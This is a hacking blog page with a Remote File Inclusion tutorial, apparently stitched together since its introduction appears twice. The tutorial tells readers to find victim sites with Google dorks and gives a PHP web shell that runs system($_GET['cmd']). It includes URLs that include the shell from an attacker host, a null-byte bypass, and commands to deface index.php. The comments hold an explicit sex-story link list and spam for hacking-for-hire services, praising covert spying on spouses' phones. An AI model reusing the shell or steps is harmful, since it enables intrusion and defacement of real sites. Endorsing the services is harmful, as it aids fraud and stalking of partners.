RFI stands for Remote File Inclusion, and it allows the attacker to
upload a custom coded/malicious file on a website or server using a
script. 
The
vulnerability exploit the poor validation checks in websites and can
eventually lead to code execution on server or code execution on website
(XSS attack using javascript). This time, I will be writing a
simple tutorial on Remote File Inclusion and by the end of tutorial, i
suppose you will know what it is all about and may be able to deploy an
attack or two.
RFI is a common vulnerability, and trust me all website hacking is not exactly about SQL injection. Using RFI you can literally deface the websites, get access to the server and do almost anything (including gagging them out or beg..well that's an exaggeration but I guess you get the idea :P ) . What makes it more dangerous is that you only need to have your common sense and basic knowledge of PHP to execute this one, some BASH might come handy as most of servers today are hosted on Linux..
Okay..Lets start..The first step is to find vulnerable site..you can easily find them using Google dorks..If you don't have any idea, you might want to read about advanced password hacking using Google dorks or to use automated tool to apply Google dorks using Google. Now lets assume we have found a vulnerable website
I leave the rest on your creativity..
COMPLETE HACKING IN ONE EBOOK DOWNLOAD NOW CERTIFIED ETHICAL COURSE FOR FREE
The
vulnerability exploit the poor validation checks in websites and can
eventually lead to code execution on server or code execution on website
(XSS attack using javascript). This time, I will be writing a
simple tutorial on Remote File Inclusion and by the end of tutorial, i
suppose you will know what it is all about and may be able to deploy an
attack or two.RFI is a common vulnerability, and trust me all website hacking is not exactly about SQL injection. Using RFI you can literally deface the websites, get access to the server and do almost anything (including gagging them out or beg..well that's an exaggeration but I guess you get the idea :P ) . What makes it more dangerous is that you only need to have your common sense and basic knowledge of PHP to execute this one, some BASH might come handy as most of servers today are hosted on Linux..
Okay..Lets start..The first step is to find vulnerable site..you can easily find them using Google dorks..If you don't have any idea, you might want to read about advanced password hacking using Google dorks or to use automated tool to apply Google dorks using Google. Now lets assume we have found a vulnerable website
http://victimsite.com/index.php?page=homeAs you can see, this website pulls documents stored in text format from server and renders them as web pages. We can find ways around it as it uses PHP include function to pull them out..check it out.
http://victimsite.com/index.php?page=http://hackersite.com/evilscript.txtI have included a custom script “eveilscript” in text format from my website, which contains some code..Now..if its a vulnerable website, then 3 cases happen -
- Case 1 - You might have noticed that the url consisted of “”page=home” had no extension, but I have included an extension in my url,hence the site may give an error like “failure to include evilscript.txt.txt”, this might happen as the site may be automatically adding the .txt extension to the pages stored in server.
- Case 2 - In case, it automatically appends something in the lines of .php then we have to use a null byte “%00” in order to avoid error.
- Case 3 – successfull execution :)
<?php
echo "<script>alert(U 4r3 0wn3d !!);</script>";
echo "Run command: ".htmlspecialchars($_GET['cmd']);
system($_GET['cmd']);
?>The above code allows you to exploit include function and tests if the site if RFI (XSS) vulnerable by running the alert box code and if successful, you can send custom commands to the linux server in bash. So…If you are in luck and if it worked, lets try our hands on some Linux commands. For example to find the current working directory of server and then to list files, we will be using “pwd” and “ls” commands.
http//victimsite.com/index.php?cmd=pwd&page=http://hackersite.com/ourscriptWhat it does is that it sends the command as cmd we put in our script, and begins print the working directory and list the documents..Even better..you can almost make the page proclaim that you hacked it by using the “echo” command..
http//victimsite.com/index.php?cmd=ls&page=http://hackersite.com/ourscript
cmd=echo U r pwn3d by xero> index.phpIt will then re-write the index.php and render it..In case,its a primitive website which stores pages with .txt extension, you might want to put it with along the .txt files.Now..as expected..We are now the alpha and the omega of the website :) we can download, remove, rename, anything! Want to download stuff ? try the “wget” function (cmd=wget.. get the idea..)..Want to move it out ? “mv”..
I leave the rest on your creativity..
COMPLETE HACKING IN ONE EBOOK DOWNLOAD NOW CERTIFIED ETHICAL COURSE FOR FREE
Posted in: 
5 comments:
Hindi Latest Sex Stories From Bhauja.com
रात-दिन तुम्हारा लंड अपनी चूत में रखना है (Raat Din Tumhara Lund Chut me Rakhna hai)
शादी के बाद चूत की प्यास (Shadi Ke Baad Chut Ki Pyas)
भाभी ने छोटी बहन को चुदवाया
अपनी बीवी समझना (Apni Biwi Samajhna)
पराये मर्द के नीचे लेट कर लिया मजा-3
भाभी और उसकी बहन को जयपुर में चोदा
रीना ने अपनी सील तुड़वाई (Rina Ne Apne Seal Tudyai)
विधवा भाभी की चुदाई-2
शर्म, हया, लज्जा और चुदाई का मजा-2
प्रेम के अनमोल क्षण-1
भाभी तड़प गई ( Bhabhi Tadap Gayi)
रचना की चूत की खुजली (Rachna Ki Chut Ki Khujli)
भाभी की गाँड-चुदाई (Bhabhi Ki Gand Chudai Badi Kaske)
मेरी सीधी सरल भाभी (Meri Sidhi Saral Bhabhi)
Chacheri Bahen Ke Sone Ke Bad Nanga Karke Sab Kuch Dekha
Subah 5 Baje Padoswali Pinky Ko Choda (Long)
दोस्त की शादीशुदा बहन को चोदा-2
मेरी बेवफा बीवी
एक शाम अनजान हसीना के नाम
प्रेम के अनमोल क्षण-1 ( Prem Ke Anmol Khyan -1)
प्रेम के अनमोल क्षण-2 (Prem Ke Anmol Khyan - 2)
अब मैं तुम्हारी हो गई-2 (Ab Mein Tumhari Ho Gayi -2)
फरेज़ को पता है (Pharenj Ko Pata He)
कुड़ी पतंग हो गई (Kudi Patanga Ho Gayi)
एक जल्दी वाला राउंड (Ek Jaldi Bala Round)
Komal ki Komal Aur Reshma ki Reshmi Chut
Ek Doctor Hi Ye Samaz Sakta Hai
Pati Ke Batije Aur Ek Punjabi Loure Se Chudwaya
GREETINGS EVERYONE, are you looking for a LEGIT and Trustworthy HACKERS with 100% Guarantee and you want to get your job done urgently withing one Hour or you are face with delay and unnecessary excuses and error on your job?. Then Worry no more because easyhackingguru@gmail.com are the Best Bet in any hacking Services. They are ready to render and attend to your job with swift response and No delay at all.
Their services are outlined as follows:
. LONG TIME LOAN GIVING
. PROFESSIONAL in SCHOOL GRADE hanging
. WHATSAPP Hack
. FACBOOK hack
. PROFESSIONAL in any BANK ACCOUNTS TRANSFER
. TWITTERS hack
. EMAIL,YAHOOMAIL and HOTMAIL ACCOUNTS hack
. WEBSITE CRASHED hack
. SERVER CRASHED hack
. SALES OF SPYWARE and KEYLOGGER SOFTWARE
. RETRIVAL OF LOST FILES and DOCUMENTS
. ERASE and EXPUNGE of CRIMINAL RECORDS
. DATABASE hack
. SALES of ATM CARDS in WHITE
. SKYPE hack
. PAYPAL hack
. DROPBOX ACCOUNT hack and Lots more..........
CONTACT: their services at easyhackingguru@gmail.com and you will be glad you did
whatsApp contact- +12182085613
HE IS THE BEST HACKER FOR THE JOB HE JUST HELPED ME HEACK INTO MY SPOUSE PHONE AND AS I SPEAK I CAN SPY ON HER PHONE REMOTELY ASOLUTELY ALL YOU CAN HIRE HIM HE IS THE BEST 100% LEGIT HACKINTECHNOLOGY@GMAIL.COM +16692252253
My wife was putting up some attitude and acting strange,and we have been married for eight years,I explained my problems to my friend and he recommended brillianthackers800@gmail.com,I sent him a mail explaining my situation to him and he helped me hack into her phone,Walt sent me a WhatsApp conversation between my wife and her concubine which she told him everything about me and our marriage and he also recorded a call conversation between she and her concubine talking about how they were going to kill me and take my money and properties,I took this to court and I won the case,they were locked up in prison all thanks to Walt who saved my life through his hacking experience,every dollar I spent on this job was worth it,message him and he will help you with your problems.
I’d like to recommend this great hacker who helped me when I was in some situation, hes very fast and reliable he will do everything you need, (cybertechhub100 at gmail dot com) ,I have been scammed a lot looking for a good hacker until i worked with this pro hacker that my colleague introduced me to, I must say he’s the best and most reliable one out there… his charges were quite very affordable. I had my credit card topped up and also my credit score boosted within 2 days of work. He’s so amazing. You welcome by the way.
He also cloned my wife’s phone… i’ve been able to see all her call logs,texts,emails,social media accounts and more for over 4 months now… She isnt even aware. All thanks to (cybertechhub100 at gmail dot com). Don’t hesitate to contact him.
Post a Comment